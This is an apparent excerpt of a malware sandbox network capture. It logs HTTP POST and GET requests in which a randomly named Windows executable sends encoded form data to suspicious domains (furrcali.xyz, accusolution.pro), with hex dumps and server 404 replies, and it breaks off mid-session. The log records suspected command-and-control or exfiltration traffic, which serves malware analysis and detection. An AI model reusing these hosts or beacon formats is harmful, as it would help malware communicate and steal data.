                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161567926 CET1236INData Raw: 65 61 3e 3c 6d 61 70 20 64 72 6f 70 7a 6f 6e 65 3d 22 36 36 32 37 34 36 22 3e 3c 2f 6d 61 70 3e 3c 64 69 76 20 6c 61 6e 67 3d 22 38 39 31 30 63 64 22 20 63 6c 61 73 73 3d 22 6c 32 38 32 66 39 20 6c 6f 67 69 6e 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                              Data Ascii: ea><map dropzone="662746"></map><div lang="8910cd" class="l282f9 login-modal-content"><bdo date-time="458d5b"></bdo><dfn dir="7d5c84"></dfn><font lang="e5e01c"></font><div draggable="6911ee" class="m14ba6 title"></div><ins draggable="cf6
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161606073 CET1236INData Raw: e6 89 8b e6 9c ba e9 aa 8c e8 af 81 e7 a0 81 22 3e 3c 73 70 61 6e 20 69 64 3d 22 6c 6f 67 69 6e 5f 67 65 74 43 6f 64 65 22 20 63 6c 61 73 73 3d 22 76 38 65 33 65 32 20 76 65 72 69 66 79 2d 62 74 6e 20 61 63 74 69 76 65 22 3e e8 8e b7 e5 8f 96 e9
                                                                                                                                                                                                                                              Data Ascii: "><span id="login_getCode" class="v8e3e2 verify-btn active"></span></div><tt draggable="2a0f52"></tt><var dropzone="71f07d"></var><area date-time="319f66"></area><div dropzone="4ee3ec" class="w7e91a input-error-ti
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161640882 CET1236INData Raw: 22 75 73 65 72 5f 6d 6f 64 61 6c 22 20 63 6c 61 73 73 3d 22 63 30 32 38 30 64 20 75 73 65 72 2d 6d 6f 64 61 6c 22 3e 3c 69 6e 73 20 64 69 72 3d 22 64 36 32 39 34 31 22 3e 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 32 63 61 34 34 63
                                                                                                                                                                                                                                              Data Ascii: "user_modal" class="c0280d user-modal"><ins dir="d62941"></ins><small lang="2ca44c"></small><sup draggable="6c1392"></sup><div date-time="53a171" class="d65e8d modal-wrap pc"><span class="e1f5db close-btn" id="user_close"></span><time dropzone
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161679029 CET1236INData Raw: 3e 3c 64 69 76 20 6c 61 6e 67 3d 22 30 31 66 38 35 63 22 20 63 6c 61 73 73 3d 22 6c 65 35 39 34 37 20 63 6f 6e 74 61 69 6e 65 72 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 77 77
                                                                                                                                                                                                                                              Data Ascii: ><div lang="01f85c" class="le5947 container" itemscope=""><meta content="http://www.kanpazhibo.net" itemprop="url"><font lang="1c6ffe"></font><ins draggable="d347ff"></ins><small dropzone="9ce3c2"></small><div draggable="d33ab3" class="mde43f
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.281788111 CET1236INData Raw: 37 37 33 3b e4 b8 8b e8 bd bd 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 69 6e 73 20 64 72 6f 70 7a 6f 6e 65 3d 22 31 65 61 61 62 34 22 3e 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 64 61 74 65 2d 74 69 6d 65 3d 22 62
                                                                                                                                                                                                                                              Data Ascii: 773;</span></h1></div></div><ins dropzone="1eaab4"></ins><small date-time="b3acdd"></small><sup dir="26b860"></sup><div lang="282f9f" class="u896eb detail-wrap"><time lang="f80797"></time><tt draggable="4804c9"></tt><var dropzone="a424d0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              21192.168.2.449969103.106.67.112804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.714456081 CET689OUTPOST /3dtl/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.furrcali.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.furrcali.xyz
                                                                                                                                                                                                                                              Referer: http://www.furrcali.xyz/3dtl/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 62 52 62 4c 46 38 4b 2f 71 31 69 6e 36 50 6d 73 43 43 41 73 46 58 66 39 47 71 75 44 35 77 7a 50 68 74 72 70 58 59 57 31 4d 47 37 6b 50 6f 4c 67 30 71 39 65 38 31 72 59 79 73 54 54 72 6e 7a 77 69 70 7a 47 73 4f 51 35 6e 6d 51 6f 78 50 34 4d 4d 77 56 54 5a 58 56 78 59 75 37 38 34 74 41 76 45 56 68 58 2b 34 45 41 70 68 42 46 6e 54 4a 47 45 32 7a 36 52 5a 6b 37 72 71 47 4d 7a 64 35 54 54 7a 75 75 6b 73 35 65 74 58 73 48 73 61 6d 62 37 44 38 53 48 50 72 76 32 35 72 70 48 64 62 6f 6f 63 53 48 79 57 62 49 67 4d 41 31 55 30 65 79 48 54 50 44 38 59 30 6e 35 65 77 46 49 4e 54 47 6d 41 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=bRbLF8K/q1in6PmsCCAsFXf9GquD5wzPhtrpXYW1MG7kPoLg0q9e81rYysTTrnzwipzGsOQ5nmQoxP4MMwVTZXVxYu784tAvEVhX+4EAphBFnTJGE2z6RZk7rqGMzd5TTzuuks5etXsHsamb7D8SHPrv25rpHdboocSHyWbIgMA1U0eyHTPD8Y0n5ewFINTGmA==


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              22192.168.2.449974103.106.67.112804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.382694006 CET709OUTPOST /3dtl/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.furrcali.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.furrcali.xyz
                                                                                                                                                                                                                                              Referer: http://www.furrcali.xyz/3dtl/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 62 52 62 4c 46 38 4b 2f 71 31 69 6e 36 75 32 73 45 68 6f 73 4e 58 66 38 44 71 75 44 67 67 7a 54 68 74 58 70 58 5a 54 2b 4d 55 66 6b 4f 4e 6e 67 33 72 39 65 2f 31 72 59 36 4d 54 57 6d 48 79 2b 69 70 33 4f 73 4f 73 35 6e 6d 30 6f 78 4e 77 4d 4d 44 4e 4d 61 6e 56 7a 51 4f 37 2b 6e 39 41 76 45 56 68 58 2b 34 51 6d 70 6c 74 46 6e 6a 5a 47 46 58 7a 31 50 4a 6b 30 2f 36 47 4d 35 39 35 58 54 7a 75 63 6b 74 56 34 74 52 6f 48 73 62 57 62 36 57 41 64 4d 50 72 70 34 5a 71 43 4f 38 71 39 6c 4d 36 50 2f 45 32 7a 67 65 49 49 63 53 54 6f 57 69 75 55 75 59 51 55 6b 5a 35 78 46 4f 75 50 39 43 7a 43 42 41 68 58 34 35 35 4b 44 58 32 59 50 69 70 56 48 62 41 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=bRbLF8K/q1in6u2sEhosNXf8DquDggzThtXpXZT+MUfkONng3r9e/1rY6MTWmHy+ip3OsOs5nm0oxNwMMDNManVzQO7+n9AvEVhX+4QmpltFnjZGFXz1PJk0/6GM595XTzucktV4tRoHsbWb6WAdMPrp4ZqCO8q9lM6P/E2zgeIIcSToWiuUuYQUkZ5xFOuP9CzCBAhX455KDX2YPipVHbA=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              23192.168.2.449980103.106.67.112804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.038630009 CET10791OUTPOST /3dtl/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.furrcali.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.furrcali.xyz
                                                                                                                                                                                                                                              Referer: http://www.furrcali.xyz/3dtl/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 62 52 62 4c 46 38 4b 2f 71 31 69 6e 36 75 32 73 45 68 6f 73 4e 58 66 38 44 71 75 44 67 67 7a 54 68 74 58 70 58 5a 54 2b 4d 55 58 6b 50 2f 76 67 33 4a 56 65 77 56 72 59 77 73 54 74 6d 48 7a 69 69 70 50 4b 73 4f 68 62 6e 6b 63 6f 7a 75 6f 4d 64 6d 68 4d 42 58 56 7a 53 4f 37 37 34 74 41 36 45 55 52 54 2b 34 41 6d 70 6c 74 46 6e 6c 56 47 44 47 7a 31 4e 4a 6b 37 72 71 47 36 7a 64 35 76 54 7a 33 72 6b 74 68 4f 75 68 49 48 69 62 47 62 38 67 55 64 54 2f 72 72 37 5a 71 61 4f 38 6e 74 6c 4d 6e 30 2f 41 33 37 67 63 55 49 5a 48 32 75 4c 78 61 75 39 71 64 4a 2f 65 51 56 63 74 4b 30 6c 79 66 62 4f 68 70 73 6b 4b 56 30 43 6b 48 51 63 44 31 6a 45 75 67 34 64 2b 55 63 6f 75 6b 43 58 46 4f 4a 71 64 53 47 49 38 32 62 63 62 61 4d 32 7a 51 58 52 2b 6d 39 69 6d 33 74 75 52 63 6b 50 4d 52 34 4f 63 31 44 2b 71 53 45 42 78 75 6e 72 30 6a 74 64 31 49 65 78 33 6b 37 54 43 68 6e 72 4a 32 74 73 45 4a 6b 63 63 34 48 6b 6e 37 4a 70 6b 58 6c 38 75 46 71 55 6e 57 54 63 47 65 71 2b 75 72 39 32 67 45 76 50 43 53 32 65 78 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4v7=bRbLF8K/q1in6u2sEhosNXf8DquDggzThtXpXZT+MUXkP/vg3JVewVrYwsTtmHziipPKsOhbnkcozuoMdmhMBXVzSO774tA6EURT+4AmpltFnlVGDGz1NJk7rqG6zd5vTz3rkthOuhIHibGb8gUdT/rr7ZqaO8ntlMn0/A37gcUIZH2uLxau9qdJ/eQVctK0lyfbOhpskKV0CkHQcD1jEug4d+UcoukCXFOJqdSGI82bcbaM2zQXR+m9im3tuRckPMR4Oc1D+qSEBxunr0jtd1Iex3k7TChnrJ2tsEJkcc4Hkn7JpkXl8uFqUnWTcGeq+ur92gEvPCS2exVxAp9ckTFeaQqxFSvcImq2UMTODf/G+YZYrWQvsIPfpEb+tPG7z6sSInnokyHhsAXEhqYg3EG0nxLjYEQ+hicOtSekxmhvKs5w8Sz6RfobIGfYjqygIt0RHTgAjObENPqgcE+LKERp8zM/pq/NXYCCwfXhZhZj/iA2ZrxNwYeqUGKZAj1vzZJxLxbUwJZD8q8H4t3x1sRSrzJa3eAyF8K4DieMfYA4ElT6IYGP3mOHxo7TRyW+0XM+R5JdrgMdxWAJKh1U8LeInFFb+sIpZfk4Cl/kOQ14wLJfniD8FWVACgKoJIecCGkrsxgt7FpJ9jysLhMhqyDBDyIB2JZNsQtzHetjrudwVJtHzPORGJ3c69bP1olWzAPHUyOQRlHRbm5HWjLFYTUsP6KRCDA5D3EFmKSWK0qbu7WypZh/9q1dTKk/nz4mU/i2KQ1YoFTVLg5dzfSdkJPcsePc6QdJACamoiQSzTNzEnwLXRPx5tQfS3KGeNbYtwgYZVKGZ03sCzW+rx7S+6r67XxvRnzR2yqc4CCsBtebOJnkG7gojzT6BeOcnrsCi9TJ+Jw0mINuXmDZaW7X+tosToGOiZYMRLsaz7ZCIib+RFR2HbpeMUn74ysWtq5YmPA1Ms6a+9x+PtmYFx0z9BolBsrjblM6KIcCqWbmND/URjp/ [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              24192.168.2.449988103.106.67.112804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.689892054 CET423OUTGET /3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.furrcali.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              25192.168.2.450007185.68.108.243804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.942928076 CET701OUTPOST /45u5/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.accusolution.pro
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.accusolution.pro
                                                                                                                                                                                                                                              Referer: http://www.accusolution.pro/45u5/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 35 52 6f 6d 78 7a 6a 46 57 4b 4e 38 56 74 54 42 5a 72 45 51 6a 42 31 45 39 48 6c 76 4e 38 2b 32 63 2b 79 70 59 63 57 7a 4f 43 54 54 54 6b 64 47 64 4f 48 75 74 4c 4e 34 4e 7a 73 48 71 34 7a 62 5a 53 79 7a 44 37 41 72 67 74 56 6d 4d 69 41 6c 34 59 6b 54 51 7a 34 33 34 2b 34 42 32 6b 76 65 43 48 76 79 4c 62 48 6f 34 78 53 6d 48 76 51 72 7a 2b 47 4d 59 74 59 2f 73 4b 76 4b 4c 44 57 39 74 36 2f 30 47 76 6c 59 46 6d 38 42 51 7a 66 68 32 5a 32 74 4f 2f 76 76 62 43 69 56 6e 73 67 73 56 46 4e 34 30 34 4f 4a 77 71 66 56 54 73 7a 66 55 2f 5a 72 53 77 33 34 37 64 53 41 58 53 4a 69 38 77 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=5RomxzjFWKN8VtTBZrEQjB1E9HlvN8+2c+ypYcWzOCTTTkdGdOHutLN4NzsHq4zbZSyzD7ArgtVmMiAl4YkTQz434+4B2kveCHvyLbHo4xSmHvQrz+GMYtY/sKvKLDW9t6/0GvlYFm8BQzfh2Z2tO/vvbCiVnsgsVFN404OJwqfVTszfU/ZrSw347dSAXSJi8w==
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153470039 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              content-length: 1251
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:10:04 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153528929 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                                                                                                              Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              26192.168.2.450016185.68.108.243804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.598787069 CET721OUTPOST /45u5/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.accusolution.pro
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.accusolution.pro
                                                                                                                                                                                                                                              Referer: http://www.accusolution.pro/45u5/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 35 52 6f 6d 78 7a 6a 46 57 4b 4e 38 55 4e 6a 42 56 72 34 51 30 78 31 48 79 6e 6c 76 66 38 2b 79 63 2b 2b 70 59 59 4f 6a 50 30 6a 54 54 48 4a 47 63 4c 72 75 71 4c 4e 34 5a 6a 73 43 6e 59 7a 41 5a 53 76 4f 44 36 38 72 67 74 42 6d 4d 6e 38 6c 35 72 63 63 53 6a 35 52 2b 2b 34 44 35 45 76 65 43 48 76 79 4c 62 54 53 34 77 32 6d 48 66 67 72 68 73 75 44 48 64 59 2b 72 4b 76 4b 61 54 58 30 74 36 2f 43 47 75 70 79 46 6b 45 42 51 78 48 68 31 49 32 71 45 2f 76 68 56 69 69 41 33 59 74 49 53 30 34 71 30 2b 62 6e 33 4c 58 48 57 71 2b 46 46 4f 34 38 41 77 54 4c 6d 61 62 30 61 52 30 72 6e 35 41 77 75 50 6e 72 7a 34 76 76 52 53 7a 69 65 52 73 55 73 76 45 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=5RomxzjFWKN8UNjBVr4Q0x1Hynlvf8+yc++pYYOjP0jTTHJGcLruqLN4ZjsCnYzAZSvOD68rgtBmMn8l5rccSj5R++4D5EveCHvyLbTS4w2mHfgrhsuDHdY+rKvKaTX0t6/CGupyFkEBQxHh1I2qE/vhViiA3YtIS04q0+bn3LXHWq+FFO48AwTLmab0aR0rn5AwuPnrz4vvRSzieRsUsvE=
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867351055 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              content-length: 1251
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:10:07 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867394924 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                                                                                                              Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              27192.168.2.450024185.68.108.243804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.257201910 CET10803OUTPOST /45u5/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.accusolution.pro
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.accusolution.pro
                                                                                                                                                                                                                                              Referer: http://www.accusolution.pro/45u5/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
